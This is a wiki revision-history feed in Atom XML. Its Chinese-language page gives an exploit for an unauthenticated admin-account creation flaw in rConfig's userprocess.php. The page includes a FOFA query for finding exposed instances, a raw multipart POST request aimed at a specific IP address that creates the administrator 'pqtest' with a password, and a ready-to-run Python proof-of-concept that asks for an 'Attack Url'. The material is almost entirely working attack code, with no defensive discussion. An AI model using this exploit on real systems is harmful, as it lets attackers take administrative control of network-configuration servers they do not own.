<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=RConfig_userprocess.php_%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6%E5%89%B5%E5%BB%BA%E6%BC%8F%E6%B4%9E</id>
	<title>RConfig userprocess.php 任意用戶創建漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=RConfig_userprocess.php_%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6%E5%89%B5%E5%BB%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=RConfig_userprocess.php_%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6%E5%89%B5%E5%BB%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-11T04:59:02Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=RConfig_userprocess.php_%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6%E5%89%B5%E5%BB%BA%E6%BC%8F%E6%B4%9E&amp;diff=2699&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==FOFA== &lt;pre&gt; app=&quot;rConfig&quot; &lt;/pre&gt;  ==漏洞利用== 發送如下請求包創建管理員用戶 pqtest，密碼為 PQtest@123  &lt;pre&gt; POST /lib/crud/userprocess.php HTTP/1.1 H...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=RConfig_userprocess.php_%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6%E5%89%B5%E5%BB%BA%E6%BC%8F%E6%B4%9E&amp;diff=2699&amp;oldid=prev"/>
		<updated>2021-05-07T08:20:04Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==FOFA== &amp;lt;pre&amp;gt; app=&amp;quot;rConfig&amp;quot; &amp;lt;/pre&amp;gt;  ==漏洞利用== 發送如下請求包創建管理員用戶 pqtest，密碼為 PQtest@123  &amp;lt;pre&amp;gt; POST /lib/crud/userprocess.php HTTP/1.1 H...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==FOFA==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
app=&amp;quot;rConfig&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==漏洞利用==&lt;br /&gt;
發送如下請求包創建管理員用戶 pqtest，密碼為 PQtest@123&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
POST /lib/crud/userprocess.php HTTP/1.1&lt;br /&gt;
Host: 194.149.41.11&lt;br /&gt;
User-Agent: python-requests/2.25.1&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Accept: */*&lt;br /&gt;
Connection: keep-alive&lt;br /&gt;
Content-Type: multipart/form-data; boundary=b1467349fcce4aa0ae8d44439f4e06bc&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
Referer: http://194.149.41.11/useradmin.php&lt;br /&gt;
Origin: http://194.149.41.11/&lt;br /&gt;
Cookie: PHPSESSID=pq&lt;br /&gt;
Content-Length: 697&lt;br /&gt;
&lt;br /&gt;
--b1467349fcce4aa0ae8d44439f4e06bc&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;username&amp;quot;&lt;br /&gt;
&lt;br /&gt;
pqtest&lt;br /&gt;
--b1467349fcce4aa0ae8d44439f4e06bc&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;password&amp;quot;&lt;br /&gt;
&lt;br /&gt;
PQtest@123&lt;br /&gt;
--b1467349fcce4aa0ae8d44439f4e06bc&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;passconf&amp;quot;&lt;br /&gt;
&lt;br /&gt;
PQtest@123&lt;br /&gt;
--b1467349fcce4aa0ae8d44439f4e06bc&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;email&amp;quot;&lt;br /&gt;
&lt;br /&gt;
PQtest@test.com&lt;br /&gt;
--b1467349fcce4aa0ae8d44439f4e06bc&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;ulevelid&amp;quot;&lt;br /&gt;
&lt;br /&gt;
9&lt;br /&gt;
--b1467349fcce4aa0ae8d44439f4e06bc&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;add&amp;quot;&lt;br /&gt;
&lt;br /&gt;
add&lt;br /&gt;
--b1467349fcce4aa0ae8d44439f4e06bc&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;editid&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
--b1467349fcce4aa0ae8d44439f4e06bc--&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/python3&lt;br /&gt;
#-*- coding:utf-8 -*-&lt;br /&gt;
# author : PeiQi&lt;br /&gt;
# from   : http://wiki.peiqi.tech&lt;br /&gt;
&lt;br /&gt;
import base64&lt;br /&gt;
import requests&lt;br /&gt;
import random&lt;br /&gt;
import re&lt;br /&gt;
import json&lt;br /&gt;
import sys&lt;br /&gt;
from requests.packages.urllib3.exceptions import InsecureRequestWarning&lt;br /&gt;
from requests_toolbelt.multipart.encoder import MultipartEncoder&lt;br /&gt;
&lt;br /&gt;
def title():&lt;br /&gt;
    print('+------------------------------------------')&lt;br /&gt;
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')&lt;br /&gt;
    print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')&lt;br /&gt;
    print('+  \033[34m公众号  : PeiQi文库                                                   \033[0m')&lt;br /&gt;
    print('+  \033[34mVersion: rConfig userprocess.php 任意用户创建漏洞                     \033[0m')&lt;br /&gt;
    print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')&lt;br /&gt;
    print('+  \033[36mUrl         &amp;gt;&amp;gt;&amp;gt; http://xxx.xxx.xxx.xxx                             \033[0m')&lt;br /&gt;
    print('+------------------------------------------')&lt;br /&gt;
&lt;br /&gt;
def POC_1(target_url):&lt;br /&gt;
    vuln_url = target_url + &amp;quot;/lib/crud/userprocess.php&amp;quot;&lt;br /&gt;
    referer = target_url + &amp;quot;useradmin.php&amp;quot;&lt;br /&gt;
    ran_number = random.randint(1, 999)&lt;br /&gt;
    origin = target_url&lt;br /&gt;
    multipart_data = MultipartEncoder(&lt;br /&gt;
        fields={&lt;br /&gt;
            'username': 'pqtest{}'.format(ran_number),&lt;br /&gt;
            'password': 'PQtest@{}'.format(ran_number),&lt;br /&gt;
            'passconf': 'PQtest@{}'.format(ran_number),&lt;br /&gt;
            'email': 'PQtest{}@test.com'.format(ran_number),&lt;br /&gt;
            'ulevelid': '9',&lt;br /&gt;
            'add': 'add',&lt;br /&gt;
            'editid': ''&lt;br /&gt;
        }&lt;br /&gt;
    )&lt;br /&gt;
    headers = {'Content-Type': multipart_data.content_type, &amp;quot;Upgrade-Insecure-Requests&amp;quot;: &amp;quot;1&amp;quot;, &amp;quot;Referer&amp;quot;: referer,&lt;br /&gt;
               &amp;quot;Origin&amp;quot;: origin}&lt;br /&gt;
    cookies = {'PHPSESSID': 'pqtest{}'.format(ran_number)}&lt;br /&gt;
    print(&amp;quot;\033[36m[o] 正在创建账户..... \033[0m&amp;quot;.format(ran_number, ran_number))&lt;br /&gt;
    try:&lt;br /&gt;
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)&lt;br /&gt;
        response = requests.post(vuln_url, data=multipart_data, verify=False, cookies=cookies, headers=headers, allow_redirects=False)&lt;br /&gt;
        if &amp;quot;error&amp;quot; not in response.text:&lt;br /&gt;
            print(&amp;quot;\033[36m[o] 成功创建账户 pqtest{}/PQtest@{} \033[0m&amp;quot;.format(ran_number, ran_number))&lt;br /&gt;
        else:&lt;br /&gt;
            print(&amp;quot;\033[31m[x] 创建失败:{} \033[0m&amp;quot;)&lt;br /&gt;
    except Exception as e:&lt;br /&gt;
        print(&amp;quot;\033[31m[x] 请求失败:{} \033[0m&amp;quot;.format(e))&lt;br /&gt;
        sys.exit(0)&lt;br /&gt;
&lt;br /&gt;
#&lt;br /&gt;
if __name__ == '__main__':&lt;br /&gt;
    title()&lt;br /&gt;
    target_url = str(input(&amp;quot;\033[35mPlease input Attack Url\nUrl   &amp;gt;&amp;gt;&amp;gt; \033[0m&amp;quot;))&lt;br /&gt;
    POC_1(target_url)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==參考==&lt;br /&gt;
http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/rConfig/rConfig%20userprocess.php%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E5%88%9B%E5%BB%BA%E6%BC%8F%E6%B4%9E.html&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>